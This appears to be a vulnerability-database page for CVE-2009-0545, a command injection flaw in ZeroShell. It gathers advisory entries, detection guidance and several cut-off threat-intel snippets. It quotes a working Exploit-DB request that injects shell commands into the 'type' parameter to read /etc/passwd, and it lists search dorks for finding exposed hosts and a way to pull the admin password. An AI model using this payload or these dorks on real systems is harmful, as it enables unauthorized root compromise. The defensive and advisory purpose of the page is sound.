CVE-2009-0545
published 2009-02-12CVE-2009-0545: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a…
PriorityP180critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
90.73%
99.8th percentile
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zeroshell | zeroshell | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for unauthenticated GET requests to /cgi-bin/kerbynet with query parameters Section=NoAuthREQ, Action=x509List, and shell metacharacters (semicolons, quotes) in the 'type' parameter — this is the exploitation pattern for CVE-2009-0545. ↗
- →Successful exploitation may result in /etc/passwd content (matching root:.*:0:0:) appearing in the HTTP response body — use this as a confirmation matcher.
- →The Metasploit module targets the RunScript action post-authentication to execute payloads with root privileges after retrieving the cleartext admin password from /var/register/system/ldap/rootpw via LFI. ↗
- →Use Shodan query 'http.title:"zeroshell"', FOFA query 'title="zeroshell"', or Google dork 'intitle:"zeroshell"' to identify exposed ZeroShell instances for proactive scanning.
- ·The Metasploit module targets ZeroShell 2.0 RC2 and lower, which is a broader scope than the NVD entry (1.0beta11 and earlier) — ensure version targeting is correct for the specific engagement. ↗
- ·The admin password stored in /var/register/system/ldap/rootpw is in cleartext and is retrievable via the unauthenticated LFI before the RCE stage — defenders should monitor access to this file path. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9p53-hww6-pm2p: cgi-bin/kerbynet in ZeroShell 1
ghsa_unreviewed·2022-05-02
CVE-2009-0545 [HIGH] CWE-20 GHSA-9p53-hww6-pm2p: cgi-bin/kerbynet in ZeroShell 1
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
VulnCheck
zeroshell zeroshell Improper Input Validation
vulncheck·2009·CVSS 10.0
CVE-2009-0545 [CRITICAL] zeroshell zeroshell Improper Input Validation
zeroshell zeroshell Improper Input Validation
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
Affected: zeroshell zeroshell
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors; https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-23&host_type=src&vulnerability=cve-2009-0545; https://dashboard.shadowserver.org/statistics/hone
No detection rules found.
Exploit-DB
ZeroShell 1.0beta11 - Remote Code Execution
exploitdb·2009-02-09
CVE-2009-0545 ZeroShell 1.0beta11 - Remote Code Execution
ZeroShell 1.0beta11 - Remote Code Execution
---
ZeroShell ;%22
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:
# milw0rm.com [2009-02-09]
Nuclei
ZeroShell <= 1.0beta11 Remote Code Execution
nuclei·CVSS 10.0
CVE-2009-0545 [CRITICAL] ZeroShell <= 1.0beta11 Remote Code Execution
ZeroShell <= 1.0beta11 Remote Code Execution
ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
Template:
id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
remediation: |
Upgrade to a patched version of ZeroShell.
reference:
- https://www.exploit-db.com/exploits/8
Metasploit
ZeroShell Remote Code Execution
metasploit
ZeroShell Remote Code Execution
ZeroShell Remote Code Execution
This module exploits a vulnerability found in ZeroShell 2.0 RC2 and lower. It will leverage an unauthenticated local file inclusion vulnerability in the "/cgi-bin/kerbynet" url. The file retrieved is "/var/register/system/ldap/rootpw". This file contains the admin password in cleartext. The password is used to login as the admin user. After the authentication process is complete it will use the RunScript action to execute the payload with root privileges.
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Greynoiseio
Malicious Tag Roundup (Jun 21-Jul 16, 2021)
blogs_greynoiseio·CVSS 5.3
[MEDIUM] Malicious Tag Roundup (Jun 21-Jul 16, 2021)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
Malicious Tag Roundup (Jul 19-Aug 2, 2021)
blogs_greynoiseio·CVSS 10.0
[CRITICAL] Malicious Tag Roundup (Jul 19-Aug 2, 2021)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://www.ikkisoft.com/stuff/LC-2009-01.txthttp://www.securityfocus.com/archive/1/500763/100/0/threadedhttp://www.vupen.com/english/advisories/2009/0385http://www.zeroshell.net/eng/announcements/http://www.zeroshell.net/eng/patch-details/#C100https://www.exploit-db.com/exploits/8023http://www.ikkisoft.com/stuff/LC-2009-01.txthttp://www.securityfocus.com/archive/1/500763/100/0/threadedhttp://www.vupen.com/english/advisories/2009/0385http://www.zeroshell.net/eng/announcements/http://www.zeroshell.net/eng/patch-details/#C100https://www.exploit-db.com/exploits/8023
2009-02-12
Published
Exploited in the wild